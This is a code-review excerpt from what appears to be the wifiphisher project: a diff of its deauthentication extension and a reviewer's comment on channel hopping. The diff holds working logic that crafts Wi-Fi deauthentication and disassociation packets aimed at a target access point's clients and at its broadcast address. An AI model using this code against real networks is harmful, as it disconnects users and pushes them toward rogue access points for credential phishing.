wifiphisher/extensions/deauth.py

```diff
@@ -88,101 +63,130 @@ def get_packet(self, packet):
-
-                # in case the receiver is the access point
-                if receiver == bssid:
-                    # add the sender to the client list
-                    self._observed_clients.append(sender)
-
-                    # create and add deauthentication packets for client
-                    self.packets_to_send += self._craft_packet(sender,
-                                                               receiver,
-                                                               bssid)
-                    self.packets_to_send += self._craft_packet(receiver,
-                                                               sender,
-                                                               bssid)
-
-                # in case the sender is the access point
-                elif sender == bssid:
-                    # add the receiver to the client list
-                    self._observed_clients.append(receiver)
-
-                    # create and add deauthentication packets for client
-                    self.packets_to_send += self._craft_packet(receiver,
-                                                               sender,
-                                                               bssid)
-                    self.packets_to_send += self._craft_packet(sender,
-                                                               receiver,
-                                                               bssid)
-        return (channels, self.packets_to_send)
+        channels = list()
+        packets_to_send = list()
+
+        # when --essid is used we don't have target_ap_bssid
+        if self._data.target_ap_bssid:
+            # we need to create this packet only once
+            if self._first_run:
+                # Craft and add deauth/disas packet to broadcast address
+                packets_to_send += self._craft_packet(self._data.target_ap_bssid,
+                                                      constants.WIFI_BROADCAST,
+                                                      self._data.target_ap_bssid)
+                self._first_run = False
+
+            bssid = self._data.target_ap_bssid
+            channels.append(self._data.target_ap_channel)
+            self._channels.append(self._data.target_ap_channel)
+        else:
+            bssid = packet.addr3
+
+            # Do not send deauth for our rogue access point
+            if bssid == self._data.rogue_ap_mac:
+                return ([], [])
+
+            # obtain the channel for this packet
+            try:
+                # channel is in the third IE of Dot11Elt
+                channel = ord(packet[dot11.Dot11Elt][2].info)
+
+                # check if this is valid channel
+                if channel not in constants.ALL_2G_CHANNELS:
+                    return ([], [])
+
+                channels.append(str(channel))
+                self._channels.append(str(channel))
```

Comment:
The frequency hopping channels should be determined initially. If we don't do frequcy hopping to a particular channel, how do we sniff the frames in that channel, right?